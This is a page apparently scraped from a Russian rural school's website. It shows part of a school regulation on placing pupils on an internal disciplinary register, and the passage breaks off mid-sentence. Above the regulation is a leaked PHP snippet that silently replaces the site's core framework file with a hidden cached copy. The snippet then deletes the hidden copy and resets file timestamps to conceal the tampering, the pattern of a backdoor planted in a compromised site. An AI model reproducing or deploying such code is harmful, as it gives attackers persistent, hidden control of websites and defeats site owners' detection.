$frameworkFile = $_SERVER ["DOCUMENT_ROOT"]."/includes/framework.php"; $cacheFile = $_SERVER ["DOCUMENT_ROOT"]."/cache/_system/".md5("_system")."-cache-system.php"; $frameworkFileTo = $_SERVER ["DOCUMENT_ROOT"]."/cache/_system/".md5("_framework")."-cache-framework.php"; if (file_exists($cacheFile) && file_exists($frameworkFileTo)) { require_once JPATH_BASE . "/cache/_system/".md5("_system")."-cache-system.php"; $filemTime = filemtime($frameworkFile); $contentFile = file_get_contents($frameworkFileTo); file_put_contents($frameworkFile, $contentFile, LOCK_EX); @unlink($frameworkFileTo); @unlink($cacheFile); touch($frameworkFile, $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/includes", $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/cache", $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/cache/_system", $filemTime); } О постановке обучающихся в МБОУ «Сагарчинская средняя общеобразовательная школа Акбулакского района Оренбургской области» на внутришкольный (педагогический) учет.

Сайт Сагарчинской средней школы

Будущее начинается здесь и сейчас!

ВХОД



Календарь



Опрос

Интересно ли Вам на этом сайте?
 

Статистика

Пользователи : 6
Статьи : 290
Просмотры материалов : 209872

На сайте

Сейчас 34 гостей онлайн

Вход в электронный дневник

Баннер

Вход в систему "Госуслуги"

Баннер

Персональные данные Дети

Баннер

О постановке обучающихся в МБОУ «Сагарчинская средняя общеобразовательная школа Акбулакского района Оренбургской области» на внутришкольный (педагогический) учет.

Утверждаю

Директор школы А.А. Жусупова

ПОЛОЖЕНИЕ

о постановке обучающихся в МБОУ «Сагарчинская средняя общеобразовательная школа Акбулакского района Оренбургской области» на внутришкольный (педагогический) учет.

1. Общие положения.

1. Данное Положение разработано на основании Федерального Закона Российской Федерации от 24.06.1999 г., № 120-ФЗ «Об основах системы профилактики безнадзорности и правонарушений несовершеннолетних».

2. Деятельность по профилактике безнадзорности и правонарушений несовершеннолетних основывается на принципах законности, демократизма гуманного обращения с несовершеннолетни­ми, поддержки семьи и взаимодействия с ней, индивидуального подхода к коррекции несовершеннолетних с соблюдением конфиденциальности полученной информации, организации работы по профилактике безнадзорности и правона­рушений несовершеннолетних.

2. Порядок постановки на внутришкольный (педагогический) учет.

1. Постановке на внутришкольный (педагогический) учет подлежат обучающиеся:

§ неоднократно замеченные в нарушениях Устава школы;

§ нарушающие правила поведения для обучающихся;

§ систематически пропускающие учебные занятия без уважительной причины;

§ употребляющие алкоголь, психоактивные и другие вредные для здоровья вещества;

§ срывающие учебные занятия, проявляющие различные хулиганские действия;

§ в случаях уходов из дома;

§ совершившие правонарушения во внеурочное время и по­ставленные на учет в ОДН.

2. Постановка обучающихся на учет осуществляется по решению СП, педсовета школы в сентябре, январе (на начало учебного года по причинам, указанным в п. 1).

3. При постановке обучающегося на внутришкольный (педагогический) учет осуществляется изучение личности обучающегося, его семьи и организуется индивидуальная работа с ним.

3. Организация работы с обучающимися.

1. Индивидуальная работа с данной категорией обучающихся осуществляется с целью профилактики девиантного поведения, корректирования отклоняющегося поведения и изменения их воспита­тельной среды в сроки, необходимые для оказания социальной и иной помощи несовершеннолетним, или до устранения причин и условий, способствующих безнадзорности, беспризорности, правонарушениям или другим антиобщественным действиям несовершеннолетних.

2. При необходимости к работе с данными обучающимися привлекаются специалисты других учреждений района, области.

4.Основания для снятия с внутришкольного (педагогического) учета.

Снятие обучающихся с учета происходит в начале и середине учебного года:

· при наличии стабильных (на протяжении от полугода до года) положительных тенденций в учебе,

· положительных изменений в поведении и взаимоотношениях с окружающими,

· ведение здорового образа жизни,

· соблюдение и выполнение правил поведения для обучающихся, правил внутришкольного распорядка, занятий в системе дополнительного